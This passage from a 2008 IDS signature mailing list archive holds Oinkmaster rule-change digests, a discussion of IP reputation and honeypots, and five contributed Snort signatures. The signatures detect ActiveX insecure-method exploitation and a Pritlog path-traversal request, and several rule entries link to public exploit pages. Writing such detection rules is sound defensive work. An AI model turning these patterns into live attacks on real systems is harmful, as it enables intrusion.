2407023 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (24) (emerging-rbn-BLOCK.rules)
2407024 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (25) (emerging-rbn-BLOCK.rules)
2407025 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (26) (emerging-rbn-BLOCK.rules)
2407026 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (27) (emerging-rbn-BLOCK.rules)
2407027 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (28) (emerging-rbn-BLOCK.rules)
2407028 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (29) (emerging-rbn-BLOCK.rules)

[---] Removed rules: [---]

2406029 - ET RBN Known Russian Business Network Monitored Domains (30) (emerging-rbn.rules)
2407029 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) (emerging-rbn-BLOCK.rules)

[+++] Added non-rule lines: [+++]

-> Added to emerging-rbn-BLOCK.rules (2):
# VERSION 77
# Updated 2008-10-01 18:23:28
-> Added to emerging-rbn.rules (2):
# VERSION 77
# Updated 2008-10-01 18:23:28
-> Added to emerging-sid-msg.map (6):
2008612 || ET EXPLOIT Autodesk Design Review DWF Viewer ActiveX Control SaveAs Insecure Method || url,secunia.com/Advisories/31989/ || url,retrogod.altervista.org/9sg_autodesk_revit_arch_2009_exploit.html
2008613 || ET EXPLOIT GdPicture Pro ActiveX control SaveAsPDF Insecure Method || url,milw0rm.com/exploits/6638 || url,secunia.com/Advisories/31966/
2008614 || ET WEB_SQL_INJECTION PHP-Lance show.php catid SQL Injection || url,www.milw0rm.com/exploits/6605 || url,secunia.com/Advisories/32027/
2008615 || ET WEB_SQL_INJECTION Real Estate Manager realestate-index.php cat_id SQL Injection || url,www.milw0rm.com/exploits/6599 || url,secunia.com/Advisories/32049/
2008616 || ET WEB_SQL_INJECTION Pilot Online Training Solution news_read.php id SQL Injection || url,www.milw0rm.com/exploits/6613 || url,secunia.com/Advisories/31969/
2008617 || ET SCAN Wikto Scan || url,www.sensepost.com/research/wikto/WiktoDoc1-51.htm
-> Added to emerging-sid-msg.map.txt (6):
2008612 || ET EXPLOIT Autodesk Design Review DWF Viewer ActiveX Control SaveAs Insecure Method || url,secunia.com/Advisories/31989/ || url,retrogod.altervista.org/9sg_autodesk_revit_arch_2009_exploit.html
2008613 || ET EXPLOIT GdPicture Pro ActiveX control SaveAsPDF Insecure Method || url,milw0rm.com/exploits/6638 || url,secunia.com/Advisories/31966/
2008614 || ET WEB_SQL_INJECTION PHP-Lance show.php catid SQL Injection || url,www.milw0rm.com/exploits/6605 || url,secunia.com/Advisories/32027/
2008615 || ET WEB_SQL_INJECTION Real Estate Manager realestate-index.php cat_id SQL Injection || url,www.milw0rm.com/exploits/6599 || url,secunia.com/Advisories/32049/
2008616 || ET WEB_SQL_INJECTION Pilot Online Training Solution news_read.php id SQL Injection || url,www.milw0rm.com/exploits/6613 || url,secunia.com/Advisories/31969/
2008617 || ET SCAN Wikto Scan || url,www.sensepost.com/research/wikto/WiktoDoc1-51.htm
-> Added to emerging-web_sql_injection.rules (3):
#by Stillsecure
#by Stillsecure
#by Stillsecure

[---] Removed non-rule lines: [---]

-> Removed from emerging-rbn-BLOCK.rules (2):
# VERSION 74
# Updated 2008-09-29 22:09:20
-> Removed from emerging-rbn.rules (2):
# VERSION 74
# Updated 2008-09-29 22:09:20
-> Removed from emerging-sid-msg.map (2):
2406029 || ET RBN Known Russian Business Network Monitored Domains (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
2407029 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
-> Removed from emerging-sid-msg.map.txt (2):
2406029 || ET RBN Known Russian Business Network Monitored Domains (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
2407029 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork

From frank at knobbe.us Thu Oct 2 18:24:16 2008
From: frank at knobbe.us (Frank Knobbe)
Date: Thu, 02 Oct 2008 17:24:16 -0500
Subject: [Emerging-Sigs] Rule source question
In-Reply-To: <48E4E2F6.9020005@packetnexus.com>
References: <48D8F653.6040000@packetnexus.com> <48D90723.5040803@jonkmans.com> <48D90B77.8090607@packetnexus.com> <1222914185.36986.112.camel@localhost> <48E4E2F6.9020005@packetnexus.com>
Message-ID: <1222986256.3572.18.camel@localhost>

On Thu, 2008-10-02 at 11:04 -0400, Jason Lewis wrote:
> Frank this sounds to me like an IP reputation system.
> I've given some thought to a system that tracked IP reputation, which
> would in turn lead to a CIDR reputation list as well as an Autonomous
> System rep list. The idea is that a CIDR with lots of bad IPs would also
> be bad by association. It seems that a few spam blacklists work in a
> similar way.
>
> The idea of data merging isn't new and that sounds like what you're
> proposing. If an IP is on a botnet list and a spam list and an IDS alert
> list, etc... you would start to think blocking that IP is a good idea.

Well, my point there was that known botnet C&C's carry by themselves a
higher value or reputation than a scan. Even scans can be further
classified by their type if the scanning behavior is known. Some
NetBIOS/RPC/Popup scans seem to troll local ranges (for example a /24),
while ISC's DNS-scan covers the whole Internet. Some SSH scans have also
been observed across a wide range of IP's while other SSH scans again
seem to be localized.

Reputation by how many folks have seen the IP is good for scans, but I
think to provide a good list, we need to mix that with weights based on
scan/access types and/or SID of the triggering Snort rule.

On Thu, 2008-10-02 at 10:50 -0400, Matt Jonkman wrote:
> Funny you should mention that. This is exactly what SIDReporter intends
> to be. By using attackers linked to the signature they tripped and then
> correlating that amongst many sites for reliability, I believe we can
> make a VERY good list of things to block and feed that back to our users.

Gotcha. I thought it was more aimed at measuring signature performance
to improve our rules.

> The data is starting to flow with SIDReporter, thanks to the folks
> using it so far. We're learning how to manipulate this data and will be
> feeding back some trends and top attackers very soon. More input is
> required though, so please consider setting up and feeding back, it's
> all anonymous!!

Well, if you like, I can add all my IDS alerts for the last 5+ years :)
Catch me in IRC to discuss.
Cheers,
Frank

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 187 bytes
Desc: This is a digitally signed message part
Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081002/894256d7/attachment.bin

From jonkman at jonkmans.com Thu Oct 2 19:06:25 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 02 Oct 2008 19:06:25 -0400
Subject: [Emerging-Sigs] Rule source question
In-Reply-To: <1222986256.3572.18.camel@localhost>
References: <48D8F653.6040000@packetnexus.com> <48D90723.5040803@jonkmans.com> <48D90B77.8090607@packetnexus.com> <1222914185.36986.112.camel@localhost> <48E4E2F6.9020005@packetnexus.com> <1222986256.3572.18.camel@localhost>
Message-ID: <48E553F1.7030504@jonkmans.com>

Frank Knobbe wrote:
> Well, my point there was that known botnet C&C's carry by themselves a
> higher value or reputation than a scan. Even scans can be further
> classified by their type if the scanning behavior is known. Some
> NetBIOS/RPC/Popup scans seem to troll local ranges (for example a /24),
> while ISC's DNS-scan covers the whole Internet. Some SSH scans have also
> been observed across a wide range of IP's while other SSH scans again
> seem to be localized.

Agreed. I hope we can categorize by violation type, which we can deduce
by snort sigs hitting.

> Gotcha. I thought it was more aimed at measuring signature performance
> to improve our rules.

That's the initial goal, but the longer term is to make as much value
from this data for all as possible.
Matt

>
> Cheers,
> Frank
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc

From signatures at stillsecure.com Fri Oct 3 10:02:33 2008
From: signatures at stillsecure.com (signatures)
Date: Fri, 3 Oct 2008 08:02:33 -0600
Subject: [Emerging-Sigs] StillSecure: Signatures - 3rd Oct-08
Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2905@webmail.latis.com>

Hi Matt

Please find 5 New Signatures below:

1. IAS Helper COM Component iashlpr.dll activex remote DOS

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"IAS Helper COM Component iashlpr.dll activex remote DOS"; flow:to_client,established; content:"CLSID"; nocase; content:"6BC096BC-0CE6-11D1-BAAE-00C04FC2E20D"; distance:0; nocase; content:"PutProperty"; nocase; classtype:web-application-attack; reference:url,www.securityfocus.com/archive/1/archive/1/496695/100/0/threaded; reference:cve,2008-2639; reference:url,securityreason.com/securityalert/4323; sid:8413; rev:1;)

2. Novell ZENWorks for Desktops Remote Heap-Based Buffer Overflow

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Novell ZENWorks for Desktops Remote Heap-Based Buffer Overflow"; flow:to_client,established; content:"CLSID"; nocase; content:"0F517994-A6FA-4F39-BD4B-EC2DF00AEEF1"; distance:0; nocase; content:"CanUninstall"; nocase; classtype:web-application-attack; reference:bugtraq,31435; reference:url,securitytracker.com/alerts/2008/Sep/1020951.html; sid:8414; rev:1;)

3. Internet Information Service iisext.dll activex setpassword Insecure Method

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Internet Information Service iisext.dll activex setpassword Insecure Method"; flow:to_client,established; content:"CLSID"; nocase; content:"C3B32488-AFEC-11D1-9868-00A0C922E703"; distance:0; nocase; content:"SetPassword"; nocase; classtype:web-application-attack; reference:cve,2008-4301; reference:url,www.securityfocus.com/archive/1/archive/1/496694/100/0/threaded; sid:8415; rev:1;)

4. Internet Information Service adsiis.dll activex remote DOS

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Internet Information Service adsiis.dll activex remote DOS"; flow:to_client,established; content:"CLSID"; nocase; content:"D6BFA35E-89F2-11D0-8527-00C04FD8D503"; distance:0; nocase; content:"GetObject"; nocase; classtype:web-application-attack; reference:cve,2008-4300; reference:url,securityreason.com/securityalert/4325; sid:8416; rev:1;)

5. Pritlog index.php filename File Disclosure

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Pritlog index.php filename File Disclosure"; flow:established,to_server; content:"GET"; uricontent:"/index.php?option=viewEntry"; nocase; uricontent:"&filename="; nocase; pcre:"/(\.\.\/){1,}/"; classtype:web-application-attack; reference:url,secunia.com/Advisories/31969/; reference:url,www.milw0rm.com/exploits/6613; sid:8417; rev:1;)

Looking forward to your comments if any...

Thanks & Regards,
StillSecure

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081003/0aa00014/attachment-0001.html

From jlewis at packetnexus.com Fri Oct 3 11:22:37 2008
From: jlewis at packetnexus.com (Jason Lewis)
Date: Fri, 03 Oct 2008 11:22:37 -0400
Subject: [Emerging-Sigs] Rule source question
In-Reply-To: <48E4F04C.9020606@packetnexus.com>
References: <48D8F653.6040000@packetnexus.com> <48D90723.5040803@jonkmans.com> <48D90B77.8090607@packetnexus.com> <1222914185.36986.112.camel@localhost> <48E4E2F6.9020005@packetnexus.com> <48E4E422.8080405@jonkmans.com> <48E4E99D.5010408@packetnexus.com> <48E4ECB8.9040501@jonkmans.com> <48E4F04C.9020606@packetnexus.com>
Message-ID: <48E638BD.1030303@packetnexus.com>

Bad form replying to myself...but anyway.

My real honeypot network isn't up yet, so I've been testing on my Comcast
IP. I've noticed that it looks like Comcast filters the common MS ports
(135,137,139,445) and that I have zero binaries collected. I'm seeing a
few scans and attempts to exploit Veritas, but no binaries.

My question is...Are the MS ports the primary ports when binaries are
involved? If this info exists somewhere on the net, I'd love to see it.

jas

Jason Lewis wrote:
> I have it running and it's working fine. I guess I was looking for more
> in depth stuff like building modules and what other configurations
> people have...like using snort in front of the nepenthes box. Are there
> any nepenthes modules people have built that are worth looking at and
> aren't included with the source? The nepenthes mailing list seems low
> traffic, so it doesn't look like much help.
>
>> For the most part it's pretty self-explanatory I've found. Install and
>> look at nepenthes.conf. It'll mostly run out of the box (if you get all
>> the right libs to compile)
>>
>> If you have trouble post it here, very relevant to this list, and there
>> are a lot of users of nep here.
>>
>> matt
>>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>

From jim.mcquaid at gmail.com Fri Oct 3 12:37:38 2008
From: jim.mcquaid at gmail.com (James McQuaid)
Date: Fri, 3 Oct 2008 12:37:38 -0400
Subject: [Emerging-Sigs] RBN rules
Message-ID:

Atrivo was up and down for a few days, so we're just making certain that
they don't come back. When Atrivo's IP space is reallocated, we will look
at it closely, and remove IP ranges where appropriate.

RBN IP addresses include domains registered by known members of the
criminal organization, their franchises, affiliates and customers. A
considerable amount of research is involved, and as this has accumulated,
it has contributed to our ability to identify them.

Presently, the SIDs do not reflect differentiation.

Thank you,

James

> 2. RBN rules (Jack Pepper)
> Message: 2
> Date: Thu, 02 Oct 2008 11:16:27 -0500
> From: Jack Pepper
> Subject: [Emerging-Sigs] RBN rules
> To: emerging-sigs at emergingthreats.net
> Message-ID: <20081002111627.tnx37gytc4cgcws4 at mail.afferentsecurity.com>
> Content-Type: text/plain; charset=ISO-8859-1; DelSp="Yes"; format="flowed"
>
> How does the end of atrivo affect the RBN rulesets?
>
> What is the criteria for hosts to be on the "Known Russian Business
> Network Monitored Domains" rules (sids 2406000++) ?
>
> Do the various RBN sids represent different basis for making the list?
>
> thanks.
>
> jp

--
James McQuaid
http://www.jamesmcquaid.com

From emerging at emergingthreats.net Fri Oct 3 16:00:08 2008
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Fri, 3 Oct 2008 16:00:08 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20081003200008.CF25C45026@goliath.jonkmans.com>

[***] Results from Oinkmaster started Fri Oct 3 16:00:08 2008 [***]

[*] Rules modifications: [*]
None.
[---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (4): 2500080 || ET COMPROMISED Known Compromised or Hostile Host Traffic (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500081 || ET COMPROMISED Known Compromised or Hostile Host Traffic (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510080 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510081 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (4): 2500080 || ET COMPROMISED Known Compromised or Hostile Host Traffic (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500081 || ET COMPROMISED Known Compromised or Hostile Host Traffic (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510080 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510081 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From emerging at emergingthreats.net Sat Oct 4 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sat, 4 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081004200008.24AE145026@goliath.jonkmans.com> [***] Results from Oinkmaster started Sat Oct 4 16:00:08 2008 [***] [*] Rules modifications: [*] None. 
[---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (10): 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org 2500076 || ET COMPROMISED Known Compromised or Hostile Host Traffic (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500077 || ET COMPROMISED Known Compromised or Hostile Host Traffic (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500078 || ET COMPROMISED Known Compromised or Hostile Host Traffic (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500079 || ET COMPROMISED Known Compromised or Hostile Host Traffic (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510076 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510077 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510078 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510079 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (10): 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org 2500076 || ET COMPROMISED Known Compromised or Hostile Host Traffic (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500077 || ET COMPROMISED Known Compromised or Hostile Host Traffic (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500078 || ET COMPROMISED Known Compromised or Hostile Host Traffic (79) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500079 || ET COMPROMISED Known Compromised or Hostile Host Traffic (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510076 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510077 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510078 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510079 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From emerging at emergingthreats.net Sat Oct 4 18:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sat, 4 Oct 2008 18:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Weekly Signature Changes Message-ID: <20081004220008.553DA45026@goliath.jonkmans.com> [***] Results from Oinkmaster started Sat Oct 4 18:00:08 2008 [***] [+++] Added rules: [+++] 2008593 - ET TROJAN Ultimate Defender Fake AV Checkin (emerging-virus.rules) 2008594 - ET MALWARE ezday.co.kr Related Spyware User-Agent Detected (Ezshop) (emerging-malware.rules) 2008595 - ET P2P SoulSeek P2P Server Connection (emerging-p2p.rules) 2008596 - ET SCAN Brute Force Exploit Detector HTTP Buffer Overflow Detection (emerging-scan.rules) 2008597 - ET SCAN Cisco Torch SNMP Scan (emerging-scan.rules) 2008598 - ET SCAN Sipsak SIP scan (emerging-scan.rules) 2008599 - ET CURRENT_EVENTS Asprox Cookie SQL Injection Attempt (emerging.rules) 2008600 - ET MALWARE Suspicious User-Agent Detected (Windows+NT) (emerging-malware.rules) 2008601 - ET TROJAN Visual Shock Keylogger Reporting to Controller (emerging-virus.rules) 2008602 - ET TROJAN Visual Shock Keylogger Reporting Idle to Controller (emerging-virus.rules) 
    2008603 - ET MALWARE Suspicious User-Agent Detected (RLMultySocket) (emerging-malware.rules)
    2008604 - ET TROJAN Gamethief/PSW.Magania Checkin (emerging-virus.rules)
    2008605 - ET SCAN Stompy Web Application Session Scan (emerging-scan.rules)
    2008606 - ET SCAN Enumiax Inter-Asterisk Exchange Protocol Username Scan (emerging-scan.rules)
    2008607 - ET EXPLOIT Chilkat IMAP ActiveX File Execution and IE DoS (emerging-exploit.rules)
    2008608 - ET MALWARE WinFixer Trojan Related User-Agent Detected (ElectroSun NetInstaller) (emerging-malware.rules)
    2008609 - ET SCAN Sivus VOIP Vulnerability Scanner SIP Scan (emerging-scan.rules)
    2008610 - ET SCAN Sivus VOIP Vulnerability Scanner SIP Components Scan (emerging-scan.rules)
    2008611 - ET P2P SoulSeek P2P Login Response (emerging-p2p.rules)
    2008612 - ET EXPLOIT Autodesk Design Review DWF Viewer ActiveX Control SaveAs Insecure Method (emerging-exploit.rules)
    2008613 - ET EXPLOIT GdPicture Pro ActiveX control SaveAsPDF Insecure Method (emerging-exploit.rules)
    2008614 - ET WEB_SQL_INJECTION PHP-Lance show.php catid SQL Injection (emerging-web_sql_injection.rules)
    2008615 - ET WEB_SQL_INJECTION Real Estate Manager realestate-index.php cat_id SQL Injection (emerging-web_sql_injection.rules)
    2008616 - ET WEB_SQL_INJECTION Pilot Online Training Solution news_read.php id SQL Injection (emerging-web_sql_injection.rules)
    2008617 - ET SCAN Wikto Scan (emerging-scan.rules)
    2406021 - ET RBN Known Russian Business Network Monitored Domains (22) (emerging-rbn.rules)
    2406022 - ET RBN Known Russian Business Network Monitored Domains (23) (emerging-rbn.rules)
    2406023 - ET RBN Known Russian Business Network Monitored Domains (24) (emerging-rbn.rules)
    2406024 - ET RBN Known Russian Business Network Monitored Domains (25) (emerging-rbn.rules)
    2406025 - ET RBN Known Russian Business Network Monitored Domains (26) (emerging-rbn.rules)
    2406026 - ET RBN Known Russian Business Network Monitored Domains (27) (emerging-rbn.rules)
    2406027 - ET RBN Known Russian Business Network Monitored Domains (28) (emerging-rbn.rules)
    2406028 - ET RBN Known Russian Business Network Monitored Domains (29) (emerging-rbn.rules)
    2407021 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (22) (emerging-rbn-BLOCK.rules)
    2407022 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (23) (emerging-rbn-BLOCK.rules)
    2407023 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (24) (emerging-rbn-BLOCK.rules)
    2407024 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (25) (emerging-rbn-BLOCK.rules)
    2407025 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (26) (emerging-rbn-BLOCK.rules)
    2407026 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (27) (emerging-rbn-BLOCK.rules)
    2407027 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (28) (emerging-rbn-BLOCK.rules)
    2407028 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (29) (emerging-rbn-BLOCK.rules)

[///] Modified active rules: [///]

    2007922 - ET TROJAN Backdoor.Win32.VB.brg C&C Checkin (emerging-virus.rules)
    2007979 - ET TROJAN Backdoor.Win32.VB.brg C&C Reporting Version (emerging-virus.rules)
    2008334 - ET TROJAN Beizhu/Womble/Vipdataend Checking in with Controller (emerging-virus.rules)
    2008335 - ET TROJAN Beizhu/Womble/Vipdataend Controller Keepalive (emerging-virus.rules)
    2008493 - ET TROJAN Pushdo Checkin (emerging-virus.rules)
    2008508 - ET CURRENT_EVENTS Internal User may have Visited an ASPROX Infected Site (emerging.rules)
    2008587 - ET TROJAN TroDjan 2.0 Infection Report (emerging-virus.rules)
    2400000 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
    2400001 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
    2400002 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
    2400003 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
    2400004 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
    2400005 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
    2400006 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
    2400007 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
    2401000 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
    2401001 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
    2401002 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
    2401003 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
    2401004 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
    2401005 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
    2401006 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
    2401007 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
    2402000 - ET DROP Dshield Block Listed Source (emerging-dshield.rules)
    2403000 - ET DROP Dshield Block Listed Source - BLOCKING (emerging-dshield-BLOCK.rules)
    2404000 - ET DROP Known Bot C&C Server Traffic (group 1) (emerging-botcc.rules)
    2404001 - ET DROP Known Bot C&C Server Traffic (group 2) (emerging-botcc.rules)
    2404002 - ET DROP Known Bot C&C Server Traffic (group 3) (emerging-botcc.rules)
    2404003 - ET DROP Known Bot C&C Server Traffic (group 4) (emerging-botcc.rules)
    2404004 - ET DROP Known Bot C&C Server Traffic (group 5) (emerging-botcc.rules)
    2404005 - ET DROP Known Bot C&C Server Traffic (group 6) (emerging-botcc.rules)
    2404006 - ET DROP Known Bot C&C Server Traffic (group 7) (emerging-botcc.rules)
    2404007 - ET DROP Known Bot C&C Server Traffic (group 8) (emerging-botcc.rules)
    2404008 - ET DROP Known Bot C&C Server Traffic (group 9) (emerging-botcc.rules)
    2404009 - ET DROP Known Bot C&C Server Traffic (group 10) (emerging-botcc.rules)
    2404010 - ET DROP Known Bot C&C Server Traffic (group 11) (emerging-botcc.rules)
    2404011 - ET DROP Known Bot C&C Server Traffic (group 12) (emerging-botcc.rules)
    2404012 - ET DROP Known Bot C&C Server Traffic (group 13) (emerging-botcc.rules)
    2404013 - ET DROP Known Bot C&C Server Traffic (group 14) (emerging-botcc.rules)
    2404014 - ET DROP Known Bot C&C Server Traffic (group 15) (emerging-botcc.rules)
    2404015 - ET DROP Known Bot C&C Server Traffic (group 16) (emerging-botcc.rules)
    2404016 - ET DROP Known Bot C&C Server Traffic (group 17) (emerging-botcc.rules)
    2404017 - ET DROP Known Bot C&C Server Traffic (group 18) (emerging-botcc.rules)
    2404018 - ET DROP Known Bot C&C Server Traffic (group 19) (emerging-botcc.rules)
    2404019 - ET DROP Known Bot C&C Server Traffic (group 20) (emerging-botcc.rules)
    2405000 - ET DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405001 - ET DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405002 - ET DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405003 - ET DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405004 - ET DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405005 - ET DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405006 - ET DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405007 - ET DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405008 - ET DROP Known Bot C&C Traffic (group 9) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405009 - ET DROP Known Bot C&C Traffic (group 10) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405010 - ET DROP Known Bot C&C Traffic (group 11) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405011 - ET DROP Known Bot C&C Traffic (group 12) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405012 - ET DROP Known Bot C&C Traffic (group 13) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405013 - ET DROP Known Bot C&C Traffic (group 14) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405014 - ET DROP Known Bot C&C Traffic (group 15) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405015 - ET DROP Known Bot C&C Traffic (group 16) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405016 - ET DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405017 - ET DROP Known Bot C&C Traffic (group 18) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405018 - ET DROP Known Bot C&C Traffic (group 19) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405019 - ET DROP Known Bot C&C Traffic (group 20) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2406000 - ET RBN Known Russian Business Network Monitored Domains (1) (emerging-rbn.rules)
    2406001 - ET RBN Known Russian Business Network Monitored Domains (2) (emerging-rbn.rules)
    2406002 - ET RBN Known Russian Business Network Monitored Domains (3) (emerging-rbn.rules)
    2406003 - ET RBN Known Russian Business Network Monitored Domains (4) (emerging-rbn.rules)
    2406004 - ET RBN Known Russian Business Network Monitored Domains (5) (emerging-rbn.rules)
    2406005 - ET RBN Known Russian Business Network Monitored Domains (6) (emerging-rbn.rules)
    2406006 - ET RBN Known Russian Business Network Monitored Domains (7) (emerging-rbn.rules)
